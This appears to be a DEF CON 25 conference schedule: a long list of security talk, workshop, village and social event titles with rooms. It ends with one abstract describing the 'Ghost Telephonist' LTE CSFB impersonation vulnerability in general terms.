RCV-Palermo room, Promenade level-Attack Surface Discovery with Intrigue
Workshops-Octavius 4-Attacking Active Directory and Advanced Methods of Defense
Workshops-Octavius 5-Attacking and Defending 802.11ac Networks
DEFCON-Track 1-Attacking Autonomic Networks
CHV-Village Talks Outside Contest Area, Pool Level-Attacking Wireless Interfaces in Vehicles
CPV-Florentine Ballroom 4-Automated Testing using Crypto Differential Fuzzing (DO NOT RECORD)
Wireless-Florentine BR I & II - Promenade Level-Automating Physical Home Security Through Hacking
CHV-Village Talks Outside Contest Area, Pool Level-Autosar SecOC – Secure On-Board Comms
PHV-Milano VIII - Promenade Level-AWS Persistence and Lateral Movement Techniques
DEFCON-Track 2-Backdooring the Lottery and Other Security Tales in Gaming over the Past 25 Years
SEV-Emperors BR II-Beyond Phishing - Building and Sustaining a Corporate SE Program
BHV-Pisa Room-Biohackers Die
BHV-Pisa Room-Biohacking Street Law
BHV-Pisa Room-Biohacking: The Moral Imperative to Build a Better You
BHV-Pisa Room-Biotechnology Needs a Security Patch...Badly
DEFCON-Track 3-BITSInject
Night Life-Octavius 3&4-Blanketfort Con
BHV-Pisa Room-Blockchain's Role in the Disruption of the Medical Industry
CPV-Florentine Ballroom 4-Blue Team TLS Hugs
Workshops-Octavius 4-Brainwashing Embedded Systems
DEFCON-Track 3-Breaking Bitcoin Hardware Wallets
DEFCON-Track 3-Breaking the x86 Instruction Set
CPV-Florentine Ballroom 4-Breaking TLS: A Year in Incremental Privacy Improvements
DEFCON-Track 1-Breaking Wind: Adventures in Hacking Wind Farm Control Networks
VMHV-Roman 1, Promenade Level-Brief history of election machine hacking and lessons learned so far and why it is hard to tell the difference between incompetence and malice.
Demolabs-Table 5-Bropy
Workshops-Octavius 7-Build your stack with Scapy, for fun and profit
Workshops-Octavius 5-Building Application Security Automation with Python
RCV-Palermo room, Promenade level-Building Google For Criminal Enterprises
Demolabs-Table 2-bullDozer
RCV-Palermo room, Promenade level-Burner Phone Challenge
DEFCON-Track 2-Bypassing Android Password Manager Apps Without Root
DEFCON-Track 3-CableTap: Wirelessly Tapping Your Home Network
DEFCON-Track 1-Call the plumber - you have a leak in your (named) pipe
SKY-Verona/Tuin/Trevi - Promenade Level-Catch me leaking your data... if you can...
Demolabs-Table 3-CellAnalysis
SEV-Emperors BR II-Change Agents: How to Effectively Influence Intractable Corporate Cultures
SKY-Verona/Tuin/Trevi - Promenade Level-Child Abuse Material, Current Issues Trends & Technologies
DEFCON-Track 1-Cisco Catalyst Exploitation
DEFCON-Track 1-CITL and the Digital Standard - A Year Later
VMHV-Roman 1, Promenade Level-Common misconceptions and false parallels about voting technology. We can do online banking and use ATMs, why can't we vote on touch screens or online?
BHV-Pisa Room-Computational Chemistry on a Budget
DEFCON-Track 1-Controlling IoT devices with crafted radio signals
CPV-Florentine Ballroom 4-Core Illumination: Traffic Analysis in Cyberspace
Demolabs-Table 3-CrackMapExec
BHV-Pisa Room-Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science
SKY-Verona/Tuin/Trevi - Promenade Level-Crossing the Border with a Burner Phone: A Lawyer Explains Legal & Security Issues at the Border
Demolabs-Table 4-Crypt-Keeper
CPV-Florentine Ballroom 4-Cryptanalysis in the Time of Ransomware
PHV-Milano VIII - Promenade Level-CVE IDs and How to Get Them
CPV-Florentine Ballroom 4-Cypherpunks History
DEFCON-Modena Room-D0 No H4RM: A Healthcare Security Conversation
BHV-Pisa Room-Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode
DEFCON-Track 3-Dark Data
DEFCON-Capri Room-DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd
DEFCON-Track 1-DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd
DEFCON-Track 1-Dealing the perfect hand - Shuffling memory blocks on z/OS
DEFCON-Track 2-Death By 1000 Installers; on macOS, it's all broken!
SKY-Verona/Tuin/Trevi - Promenade Level-Death Numbers in Surgical room, Attacking Anesthesia Equipment.
Wireless-Florentine BR I & II - Promenade Level-Deceptacon: Wi-Fi Deception in under $5
DEFCON-Track 1-DEF CON 101 Panel
Night Life-Track 3-DEF CON Movie Night
Night Life-Track 3-DEF CON Movie Night
Night Life-Track 3-DEF CON Movie Night
Night Life-Lobby Bar-DEFCON 25 Meetup for /r/Defcon
Night Life-Sunset Park Pavilion F-DEFCON Toxic BBQ
CHV-Village Talks Outside Contest Area, Pool Level-DefCon Unofficial Badges Panel
PHV-Milano VIII - Promenade Level-Demystifying the OPM breach, WTF really happened
DEFCON-Track 1-Demystifying Windows Kernel Exploitation by Abusing GDI Objects.
BHV-Pisa Room-Designer Babies
Wireless-Florentine BR I & II - Promenade Level-Designing an Automatic Gain Control
DEFCON-Track 4-Digital Vengeance: Exploiting the Most Notorious C&C Toolkits
ICS-Calibria-Dissecting industrial wireless implementations.
BHV-Pisa Room-DIYBioweapons and Regulation
DEFCON-Track 3-DNS - Devious Name Services - Destroying Privacy & Anonymity Without Your Consent
Demolabs-Table 2-DNS-Exfil-Suite
RCV-Palermo room, Promenade level-Do Tinder Bots Dream of Electric Toys? How Tinder Bots are breaking hearts all over the world, and trashing Tinder’s reputation while they’re at it.
RCV-Palermo room, Promenade level-Domain Discovery: Expanding your scope like a boss
DEFCON-Track 3-DOOMed Point of Sale Systems
DEFCON-Track 1-Driving down the rabbit hole
Night Life-Track 2-Drunk Hacker History
Demolabs-Table 5-EAPHammer
Workshops-Octavius 5-Edge cases in web hacking
DEFCON-Track 4-Evading next-gen AV using artificial intelligence
SKY-Verona/Tuin/Trevi - Promenade Level-Everything you wanted to know about orchestration but were afraid to ask.
Workshops-Octavius 5-Exploitation/Malware Forward Engineering
DEFCON-Track 2-Exploiting 0ld Mag-stripe information with New technology
DEFCON-Track 3-Exploiting Continuous Integration (CI) and Automated Build systems
Wireless-Florentine BR I & II - Promenade Level-Failsafe: Yet Another SimplySafe Attack Vector
SKY-Verona/Tuin/Trevi - Promenade Level-FERPA - Only Your Grades Are Safe; OSINT in Higher Education
RCV-Palermo room, Promenade level-FERPA: Only Your Grades Are Safe; OSINT In Higher Education
SKY-Verona/Tuin/Trevi - Promenade Level-Financial Crime 2.0
PHV-Milano VIII - Promenade Level-Fooling the Hound: Deceiving Domain Admin Hunters
PHV-Milano VIII - Promenade Level-Fortune 100 InfoSec on a State Government Budget
Workshops-Octavius 6-Free and Easy DFIR Triage for Everyone: From Collection to Analysis
DEFCON-Track 4-Friday the 13th: JSON attacks!
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
DEFCON-Track 2-From "One Country - One Floppy" to "Startup Nation" - the story of the early days of the Israeli hacking community, and the journey towards today's vibrant startup scene
DEFCON-Track 1-From Box to Backdoor: Using Old School Tools and Techniques to Discover Backdoors in Modern Devices
IOT-Main Contest Area-From DVR worms, to fridges, via dildos, the sins of the IoT in 50 minutes
IOT-Main Contest Area-From FAR and NEAR: Exploiting Overflows on Windows 3.x
SKY-Verona/Tuin/Trevi - Promenade Level-From OPSUCK to OPSEXY: An OPSEC Primer
ICS-Calibria-Fun with Modbus function code 90.
Demolabs-Table 1-Fuzzapi
DEFCON-Track 1-Game of Chromes: Owning the Web with Zombie Chrome Extensions
DEFCON-Track 4-Game of Drones: Putting the Emerging "Drone Defense" Market to the Test
DEFCON-Track 4-Genetic Diseases to Guide Digital Hacks of the Human Genome: How the Cancer Moonshot Program will Enable Almost Anyone to Crash the Operating System that Runs You or to End Civilization...
DEFCON-Track 3-Get-$pwnd: Attacking Battle-Hardened Windows Server
DEFCON-Track 4-Ghost in the Droid: Possessing Android Applications with ParaSpectre
Demolabs-Table 2-GibberSense
PHV-Milano VIII - Promenade Level-Go Beyond Tabletop Scenarios by Building an Incident Response Simulation Platform
Wireless-Florentine BR I & II - Promenade Level-GODUMP-NG packet sniffing the Gotenna
Demolabs-Table 3-GoFetch
CHV-Village Talks Outside Contest Area, Pool Level-GPS System Integrity
CHV-Village Talks Outside Contest Area, Pool Level-Grand Theft Radio (Stopping SDR Relay Attacks on PKES)
Demolabs-Table 3-GreatFET
ICS-Calibria-Grid insecurity - and how to really fix this shit
Night Life-Octavius 5-8-GRIMM's AWESOME Arcade Party
Demolabs-Table 2-Gumbler
SKY-Verona/Tuin/Trevi - Promenade Level-Gun control - You cant put the Genie back into its bottle
Night Life-Track 2-Hacker Jeopardy
Night Life-Track 2-Hacker Jeopardy
Night Life-Roman 1, Promenade Level-Hacker Karaoke
Night Life-Roman 1, Promenade Level-Hacker Karaoke
SEV-Emperors BR II-Hackers gonna hack - But do they know why?
DEFCON-Track 4-Hacking Democracy: A Socratic Dialogue
DEFCON-Capri Room-Hacking Democracy
Workshops-Octavius 1-Hacking Network Protocols using Kali
CPV-Florentine Ballroom 4-Hacking on Multiparty Computation
DEFCON-Track 3-Hacking Smart Contracts
Wireless-Florentine BR I & II - Promenade Level-Hacking Some More of The Wireless World
DEFCON-Track 1-Hacking the Cloud
SKY-Verona/Tuin/Trevi - Promenade Level-Hacking the Law: A Call for Action Bug Bounties Legal Terms as a Case Study
BHV-Pisa Room-Hacking the Second Genetic Code using Information Theory
DEFCON-Track 2-Hacking travel routers like it's 1999
Workshops-Octavius 7-Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics
CPV-Florentine Ballroom 4-Have you seen my naked selfies? Neither has my snoopy boyfriend. Privacy within a Relationship
BHV-Pisa Room-Health as a service...
SEV-Emperors BR II-Heavy Diving for Credentials: Towards an Anonymous Phishing
DEFCON-Track 1-Here to stay: Gaining persistency by abusing advanced authentication mechanisms
Demolabs-Table 6-HI-Jack-2Factor
IOT-Main Contest Area-Hide Yo Keys, Hide Yo Car - Remotely Exploiting Connected Vehicle APIs and Apps
DEFCON-Modena-Horror stories of a translator and how a tweet can start a war with less than 140 characters
VMHV-Roman 1, Promenade Level-How did we get here: A history of voting technology, hanging chads, and the Help America Vote Act. This segment will feature a punch card machine and demo what can go wrong with it.
PHV-Milano VIII - Promenade Level-How Hackers Changed The Security Industry
ICS-Calibria-How to create dark buildings with light speed.
RCV-Palermo room, Promenade level-How to obtain 100 Facebooks accounts per day through internet searches
SEV-Emperors BR II-How to protect your banks & enterprises (Talk given by someone who robs banks & enterprises)
BHV-Pisa Room-How to use the Scientific Method in Security Research
DEFCON-Track 4-How we created the first SHA-1 collision and what it means for hash security
BHV-Pisa Room-How your doctor might be trying to kill you and how personal genomics can save your life
Demolabs-Table 2-https://crack.sh/
Night Life-Octavius 1&2-Human Zoo
BHV-Pisa Room-Human-Human Interface
SKY-Verona/Tuin/Trevi - Promenade Level-HUMSEC (or how I learned to hate my phone)
PHV-Milano VIII - Promenade Level-Hunting Down the Domain Admin and Rob Your Network
DEFCON-Track 2-I Know What You Are by the Smell of Your Wifi
ICS-ICS-Village-ICS SCADA Forensics workshop/challenge
DEFCON-Track 3-If You Give a Mouse a Microchip... It will execute a payload and cheat at your high-stakes video game tournament
IOT-Main Contest Area-IIDS: An Intrusion Detection System for IoT
BHV-Pisa Room-Implants: Show and Tell
ICS-Octavius 6-Industrial Control System Security 101 and 201- SOLD OUT
Workshops-Octavius 6-Industrial Control System Security 101 and 201
Night Life-Turin, Promenade Level-INFOSEC UNLOCKED
CHV-Village Talks Outside Contest Area, Pool Level-Insecure By Law
DEFCON-Track 1-Inside the "Meet Desai" Attack: Defending Distributed Targets from Distributed Attacks
IOT-Main Contest Area-Inside the Alaris Infusion Pump, not too much medication por favor!
IOT-Main Contest Area-Intelligent Misusers: A Case for Adversarial Modelling on IoT Devices
RCV-Palermo room, Promenade level-Into the Bird’s Nest: A Comprehensive Look at Twitter as a Research Tool
RCV-Palermo room, Promenade level-Intro to OSINT: Zero on the way to Hero
DEFCON-Track 3-Introducing HUNT: Data Driven Web Hacking & Manual Testing
PHW-Neopolitan BR IV - Promenade Level-Introducing Mallet: An Intercepting Proxy for Arbitrary Protocols
VMHV-Roman 1, Promenade Level-Introduction into hacking the equipment in the village.
PHW-Neopolitan BR IV - Promenade Level-Introduction to 802.11 Packet Dissection
PHW-Neopolitan BR IV - Promenade Level-Introduction to 802.11 Packet Dissection
Workshops-Octavius 6-Introduction to Cryptographic Attacks
Workshops-Octavius 6-Introduction to Practical Network Signature Development for Open Source IDS
ICS-ICS-Village-Introduction to the ICS Wall
Workshops-Octavius 5-Introduction to x86 disassembly
IOT-Main Contest Area-IoT - the gift that keeps on giving
BHV-Pisa Room-IoT of Dongs
IOT-Main Contest Area-IoT updates to help protect consumers
IOT-Main Contest Area-IoT Village Keynote - Friends, Not Foes: Rethinking the Researcher-Vendor Relationship
PHV-Milano VIII - Promenade Level-IP Spoofing
PHV-Milano VIII - Promenade Level-Iron Sights for Your Data
SKY-Verona/Tuin/Trevi - Promenade Level-Its Not Just the Elections!
RCV-Palermo room, Promenade level-It’s Going To Get Worse Before It Gets Better - The Future of Recon Data Mining
DEFCON-Track 2-Jailbreaking Apple Watch
PHW-Neopolitan BR IV - Promenade Level-Jailing Programs with Linux Containers
PHW-Neopolitan BR IV - Promenade Level-Jailing Programs with Linux Containers
DEFCON-Track 2-Koadic C3 - Windows COM Command & Control Framework
Demolabs-Table 1-LAMMA 1.0
Wireless-Florentine BR I & II - Promenade Level-Large Scale Wireless Monitoring - KISMET packet sniffer on a multi-radio array
Night Life-Counsel Boardroom, Promenade Level-Lawyer Meetup
PHV-Milano VIII - Promenade Level-Layer 8 and Why People are the Most Important Security Tool
SKY-Verona/Tuin/Trevi - Promenade Level-Lessons From An Incident Responder AKA, Stories Of When Shit Goes Sideways
Demolabs-Table 4-Leviathan Framework
Workshops-Octavius 1-Linux Lockdown: ModSecurity and AppArmor
CHV-Village Talks Outside Contest Area, Pool Level-Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles
DEFCON-Track 3-Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles
DEFCON-Track 1-macOS/iOS Kernel Debugging and Heap Feng Shui
PHV-Milano VIII - Promenade Level-Make Your Own 802.11ac Monitoring Hacker Gadget
DEFCON-Track 3-Malicious CDNs: Identifying Zbot Domains en Masse via SSL Certificates and Bipartite Graphs
Demolabs-Table 5-Maltego "Have I been pwned?"
Workshops-Octavius 1-Malware Triage: Malscripts Are The New Exploit Kit
DEFCON-Track 3-Man in the NFC
IOT-Main Contest Area-Manufactures Panel
DEFCON-Track 3-MEATPISTOL, A Modular Malware Implant Framework
BHV-Pisa Room-Microscopes are Stupid
DEFCON-Track 1-Microservices and FaaS for Offensive Security
BHV-Pisa Room-Might as well name it Parmigiana, American, Cheddar, and Swiss
Workshops-Octavius 6-Mobile App Attack 2.0
DEFCON-Track 1-MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt)
BHV-Pisa Room-My dog is a hacker and will steal your data!
Demolabs-Table 1-Mycroft
Night Life-Track 4-n00b Party hosted by Duo Security.
BHV-Pisa Room-Neuro Ethics
BHV-Pisa Room-Neurogenic Peptides: Smart Drugs 4-Minute Mile
SKY-Verona/Tuin/Trevi - Promenade Level-Neutrality? We don't need no stinkin' Neutrality
DEFCON-Track 4-Next-Generation Tor Onion Services
DEFCON-Track 1-Offensive Malware Analysis: Dissecting OSX/FruitFly via a Custom C&C Server
Night Life-Track 1-Official DEF CON Welcome Party
Night Life-Track 1 & Chillout lounges-Official Entertainment: ACID T
Night Life-Track 1 & Chillout lounges-Official Entertainment: CTRL/RSM
Night Life-Track 1 & Chillout lounges-Official Entertainment: DJDEAD
Night Life-Track 1 & Chillout lounges-Official Entertainment: DUALCORE
Night Life-Track 1 & Chillout lounges-Official Entertainment: JACKALOPE
Night Life-Track 1 & Chillout lounges-Official Entertainment: KILL THE NOISE
Night Life-Track 1 & Chillout lounges-Official Entertainment: KRISZ KLINK
Night Life-Track 1 & Chillout lounges-Official Entertainment: LEFT/RIGHT
Night Life-Track 1 & Chillout lounges-Official Entertainment: MC FRONTALOT
Night Life-Track 1 & Chillout lounges-Official Entertainment: MODERNS
Night Life-Track 1 & Chillout lounges-Official Entertainment: NINJULA
Night Life-Track 1 & Chillout lounges-Official Entertainment: REEL BIG FISH
Night Life-Track 1 & Chillout lounges-Official Entertainment: REID SPEED
Night Life-Track 1 & Chillout lounges-Official Entertainment: Richard Cheese
Night Life-Track 1 & Chillout lounges-Official Entertainment: SCOTCH AND BUBBLES
Night Life-Track 1 & Chillout lounges-Official Entertainment: SKITTISH AND BUS
Night Life-Track 1 & Chillout lounges-Official Entertainment: YT CRACKER
Night Life-Track 1 & Chillout lounges-Official Entertainment: ZEBBLER ENCANTI
SKY-Verona/Tuin/Trevi - Promenade Level-One-click Browser Defense
DEFCON-Track 2-Open Source Safe Cracking Robots - Combinations Under 1 Hour! (Is it bait? Damn straight it is.)
CPV-Florentine Ballroom 4-Operational Security Lessons from the Dark Web
DEFCON-Track 2-Opt Out or Deauth Trying !- Anti-Tracking Bots Radios and Keystroke Injection
RCV-Palermo room, Promenade level-OSINT Tactics on Source Code & Developers
DEFCON-Trevi Room-Panel - An Evening with the EFF
DEFCON-Capri Room-Panel - Meet the Feds (who care about security research)
DEFCON-Track 2-Panel: DEF CON Groups
DEFCON-Track 4-Panel: Meet The Feds
VMHV-Roman 1, Promenade Level-Panel: Securing the Election Office: A Local Response to a Global Threat
PHV-Milano VIII - Promenade Level-Passwords on a Phone
PHV-Milano VIII - Promenade Level-Past, Present and Future of High Speed Packet Filtering on Linux
Demolabs-Table 3-PCILeech
DEFCON-Track 2-PEIMA (Probability Engine to Identify Malicious Activity): Using Power Laws to address Denial of Service Attacks
Workshops-Octavius 1-Penetration Testing in Hostile Environments: Client & Tester Security
DEFCON-Track 1-Persisting with Microsoft Office: Abusing Extensibility Options
DEFCON-Track 2-Phone system testing and other fun tricks
Demolabs-Table 6-PIV OPACITY
Wireless-Florentine BR I & II - Promenade Level-POCSAG Amateur Pager Network
DEFCON-Track 4-Popping a Smart Gun
DEFCON-Track 1-Porosity: A Decompiler For Blockchain-Based Smart Contracts Bytecode
Workshops-Octavius 1-Practical BLE Exploitation for Internet of Things
Workshops-Octavius 7-Practical Malware Analysis: Hands-On
Workshops-Octavius 4-Principals on Leveraging PowerShell for Red Teams
CPV-Florentine Ballroom 4-Privacy is Not An Add-On: Designing for Privacy from the Ground Up
Demolabs-Table 1-probespy
CPV-Florentine Ballroom 4-Protecting Users' Privacy in a Location-Critical Enterprise: The Challenges of 9-1-1 Location
BHV-Pisa Room-Psychoactive Chemicals in Combat
Workshops-Octavius 6-Pwning machine learning systems
IOT-Main Contest Area-Pwning the Industrial IoT: RCEs and backdoors are around!
Demolabs-Table 6-Radare2
DEFCON-Track 1-Radio Exploitation 101: Characterizing, Contextualizing, and Applying Wireless Attack Methods
DEFCON-Track 1-Rage Against the Weaponized AI Propaganda Machine
DEFCON-Track 2-Real-time RFID Cloning in the Field
RCV-Palermo room, Promenade level-Recon and bug bounties what a great love story
IOT-Main Contest Area-Redesigning PKI for IoT because Crypto is Hard
Wireless-Florentine BR I & II - Promenade Level-Reverse Engineering DSSS Extended Cut
PHW-Neopolitan BR IV - Promenade Level-Reverse Engineering Malware 101
BHV-Pisa Room-Reversing Your Own Source Code
DEFCON-Track 4-Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science
SKY-Verona/Tuin/Trevi - Promenade Level-Robbing the network and ways to get there
HHV-Main Contest Area, Pool Level-Robo-Sumo
SKY-Verona/Tuin/Trevi - Promenade Level-Rockin' the (vox)Vote
Demolabs-Table 4-Ruler - Pivoting Through Exchange
CPV-Florentine Ballroom 4-rustls: modern, fast, safer TLS
Demolabs-Table 5-SamyKam
Workshops-Octavius 4-Scanning the Airwaves: building a cheap trunked radio/pager scanning system
Workshops-Octavius 7-SDR Crash Course: Hacking your way to fun and profit
SEV-Emperors BR II-SE vs Predator: Using Social Engineering in ways I never thought…
DEFCON-Track 4-Secret Tools: Learning about Government Surveillance Software You Can't Ever See
DEFCON-Track 2-Secure Tokin' and Doobiekeys: How to roll your own counterfeit hardware security devices
CPV-Florentine Ballroom 4-Security Analysis of the Telegram IM
DEFCON-Track 2-See no evil, hear no evil: Hacking invisibly and silently with light and sound
BHV-Pisa Room-Sensory Augmentation 101
PHW-Neopolitan BR IV - Promenade Level-Serious Intro to Python for Admins
PHW-Neopolitan BR IV - Promenade Level-Serious Intro to Python for Admins
VMHV-Roman 1, Promenade Level-Session on legal considerations of hacking election machines.
CPV-Florentine Ballroom 4-SHA-3 vs the world
Demolabs-Table 6/Five-ShinoBOT Family
Demolabs-Table 6/Five-ShinoBOT Family
Wireless-Florentine BR I & II - Promenade Level-SIGINT for the Rest of US
Night Life-Modena, Promenade level-Silent Disco : Party like a Hacker
SEV-Emperors BR II-Skills For A Red-Teamer
RCV-Palermo room, Promenade level-Skip tracing for fun and profit
SEV-Emperors BR II-Social Engineering with Web Analytics
Demolabs-Table 6-Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization
BHV-Pisa Room-Standardizing the Secure Deployment of Medical Devices
DEFCON-Track 3-Starting the Avalanche: Application DoS In Microservice Architectures
PHV-Milano VIII - Promenade Level-Stories from a 15 days SMB Honeypot: Mum, Tons of WannaCry and Evils Attacked Our Home!
PHV-Milano VIII - Promenade Level-Strengthen Your SecOps Team by Leveraging Neurodiversity
Workshops-Octavius 5-Subverting Privacy Exploitation Using HTTP
Wireless-Florentine BR I & II - Promenade Level-Suitcase Repeater Build for UHF - 70cm
DEFCON-Track 2-Taking Windows 10 Kernel Exploitation to the next level - Leveraging write-what-where vulnerabilities in Creators Update
BHV-Pisa Room-Tales from a healthcare hacker
BHV-Pisa Room-tDCS workshop
DEFCON-Track 2-Teaching Old Shellcode New Tricks
CHV-Village Talks Outside Contest Area, Pool Level-That’s no car. It’s a network!
DEFCON-Track 2-The Adventures of AV and the Leaky Sandbox
SKY-Verona/Tuin/Trevi - Promenade Level-The Automation and Commoditization of Infosec
CHV-Village Talks Outside Contest Area, Pool Level-The Bicho: An Advanced Car Backdoor Maker
BHV-Pisa Room-The Bitcoin DNA Challenge
DEFCON-Track 1-The Black Art of Wireless Post Exploitation
PHV-Milano VIII - Promenade Level-The Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect Wireless Pivots
DEFCON-Track 3-The Brain's Last Stand
BHV-Pisa Room-The Brave New World of Bio-Entrepreneurship
DEFCON-Track 3-The call is coming from inside the house! Are you ready for the next evolution in DDoS attacks?
BHV-Pisa Room-The collision of prosthetics, robotics and the human interface
BHV-Pisa Room-The Future is Fake Identities
ICS-Calibria-The gap in ICS Cyber security - Cyber security of Level 1 Field devices.
SEV-Emperors BR II-The Human Factor: Why Are We So Bad at Security and Risk Assessment?
DEFCON-Track 4-The Internet Already Knows I'm Pregnant
IOT-Main Contest Area-The Internet of Vulnerabilities
PHW-Neopolitan BR IV - Promenade Level-The Kali Linux Dojo - Angela Could Have Done Better
CPV-Florentine Ballroom 4-The Key Management Facility of the Root Zone DNSSEC KSK
DEFCON-Track 2-The Last CTF Talk You'll Ever Need: AMA with 20 years of DEF CON Capture-the-Flag organizers
BHV-Pisa Room-The Patient as CEO
CPV-Florentine Ballroom 4-The Policy & Business Case for Privacy By Design
BHV-Pisa Room-The Rise of Digital Medicine: At-home digital clinical research
DEFCON-Track 4-The spear to break the security wall of S7CommPlus
CPV-Florentine Ballroom 4-The Surveillance Capitalism Will Continue Until Morale Improves
CPV-Florentine Ballroom 4-The Symantec/Chrome SSL debacle - how to do this better...
CPV-Florentine Ballroom 4-The Why and How for Secure Automatic Patch Management
SEV-Emperors BR II-Thematic Social Engineering
DEFCON-Track 1-There's no place like 127.0.0.1 - Achieving reliable DNS rebinding in modern browsers
PHV-Milano VIII - Promenade Level-Threat Intel for All: There's More to Your Data Than Meets the Eye
DEFCON-Track 1-Total Recall: Implanting Passwords in Cognitive Memory
BHV-Pisa Room-Total Recall: Implanting Passwords in Cognitive Memory
RCV-Palermo room, Promenade level-Total Recoll: Conducting Investigations without Missing a Thing
DEFCON-Track 2-Tracking Spies in the Skies
SKY-Verona/Tuin/Trevi - Promenade Level-Trauma in Healthcare IT: My Differential Diagnosis and Call to Action
BHV-Pisa Room-Trigraph: An Ethereum-based Teleradiology Application
DEFCON-Track 2-Trojan-tolerant Hardware & Supply Chain Security in Practice
Demolabs-Table 2-Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
CHV-Village Talks Outside Contest Area, Pool Level-Turbo Talks – Getting Started With CarHacking, k-Line Hacking
DEFCON-Track 3-Twenty Years of MMORPG Hacking: Better Graphics, Same Exploits
Workshops-Octavius 4-UAC 0day, all day!
DEFCON-Track 1-Unboxing Android: Everything you wanted to know about Android packers
CPV-Florentine Ballroom 4-Unfairplay (NOT RECORDED)
Demolabs-Table 4-Universal Serial aBUSe
DEFCON-Track 4-Untrustworthy Hardware and How to Fix It
RCV-Palermo room, Promenade level-Up close and personal - Keeping an eye on mobile applications
ICS-ICS-Village-Using Alexa for your Control System environment
RCV-Palermo room, Promenade level-Using DFIR Orchestration and Automation Tools and Playbooks For OSINT and Recon
DEFCON-Track 1-Using GPS Spoofing to control time
RCV-Palermo room, Promenade level-Using phonetic algorithms to increase your search space and detect misspellings.
Demolabs-Table 6-Vapor Trail
VMHV-Roman 1, Promenade Level-Verified Voting
PHV-Milano VIII - Promenade Level-Visual Network and File Forensics
DEFCON-Track 2-Weaponizing Machine Learning: Humanity Was Overrated Anyway
DEFCON-Track 2-Weaponizing the BBC Micro:Bit
DEFCON-Track 2-Welcome to DEF CON 25
ICS-ICS-Village-Welcome to the ICS Village
VMHV-Roman 1, Promenade Level-What are the national security implications of cyber attacks on our voting systems? What are the motivations of our adversaries, and how should the U.S. respond to the threat?
ICS-Calibria-What's the DFIRence for ICS?
DEFCON-Track 2-When Privacy Goes Poof! Why It's Gone and Never Coming Back
PHV-Milano VIII - Promenade Level-When the Current Ransomware and Payload of the Day (CRAP of the day) Hits the Fan: Breaking the Bad News
DEFCON-Track 2-Where are the SDN Security Talks?
Night Life-Track 4-Whose Slide is it anyway?
Night Life-Track 4-Whose Slide is it anyway?
Demolabs-Table 5-WIDY 2.0: WIFI 0WNAGE IN UNDER $5 RELOADED
Demolabs-Table 4-WiFi Cactus
Demolabs-Table 4-WiFi Cactus
Wireless-Florentine BR I & II - Promenade Level-WIGLE Like You Mean It
Demolabs-Table 1-WiMonitor - an OpenWRT package for remote WiFi sniffing
Workshops-Octavius 4-Windows - The Undiscovered country
DEFCON-Track 2-Wiping out CSRF
Wireless-Florentine BR I & II - Promenade Level-Wireless Threat Modeling and Monitoring - WiNT
Night Life-The Nobu Hotel in Caesars Palace-Women, Wisdom & Wine
HHV-Main Contest Area, Pool Level-Workshop: Component Desoldering and Recovery
HHV-Main Contest Area, Pool Level-Workshop: Component Desoldering and Recovery
HHV-Main Contest Area, Pool Level-Workshop: Component Desoldering and Recovery
HHV-Main Contest Area, Pool Level-Workshop: Component Desoldering and Recovery
CPV-Florentine Ballroom 3-WS: Breaking the Uber Badge Ciphers
CPV-Florentine Ballroom 3-WS: FeatherDuster and Cryptanalib workshop
CPV-Florentine Ballroom 3-WS: Implementing An Elliptic Curve in Go
CPV-Florentine Ballroom 3-WS: Mansion Apartment Shack House: How To Explain Crypto To Practically Anyone
CPV-Florentine Ballroom 3-WS: NoiseSocket: Extending Noise to Make Every TCP Connection Secure
CPV-Florentine Ballroom 3-WS: Reasoning about Consensus Algorithms
CPV-Florentine Ballroom 3-WS: Secrets Management in the Cloud
CPV-Florentine Ballroom 3-WS: SECURE COMMUNICATIONS IN ANDROID WITH TLS/SSL
CPV-Florentine Ballroom 3-WS: Supersingular Isogeny Diffie-Hellman
DEFCON-Track 3-WSUSpendu: How to hang WSUS clients
DEFCON-Track 4-XenoScan: Scanning Memory Like a Boss
PHV-Milano VIII - Promenade Level-XSS FTW - What Can Really Be Done With Cross-Site Scripting
PHV-Milano VIII - Promenade Level-YALDA – Large Scale Data Mining for Threat Intelligence
CPV-Florentine Ballroom 4-Yet another password hashing talk
PHV-Milano VIII - Promenade Level-You're Going to Connect to the Wrong Domain

Talk/Event Descriptions


 

DEFCON - Track 4 - Sunday - 11:00-11:45


'Ghost Telephonist' Impersonates You Through LTE CSFB

Sunday at 11:00 in Track 4

45 minutes | Exploit

Yuwei Zheng Hacker

Lin Huang Hacker

One vulnerability in CSFB (Circuit Switched Fallback) in the 4G LTE network will be presented. In the CSFB procedure, we found that the authentication step is missing. As a result, an attacker can hijack the victim's communication. We named this attack 'Ghost Telephonist'. Several exploitations can be made based on this vulnerability. When the call or SMS is not encrypted, or is weakly encrypted, the attacker can impersonate the victim to receive "Mobile Terminated" calls and messages or to initiate "Mobile Originated" calls and messages. Furthermore, the Telephonist Attack can obtain the victim's phone number and then use it to mount advanced attacks, e.g. breaking into Internet online accounts. These attacks can choose victims at random, or target a given victim. We verified these attacks with our own phones in operators' networks on a small, controllable scale. The experiments proved that the vulnerability really exists. The attack doesn't need a fake base station, so the attack cost is low. The victim doesn't sense being attacked, since there is no fake base station and no cell re-selection. We are now collaborating with operators and terminal manufacturers to fix this vulnerability.

Yuwei Zheng
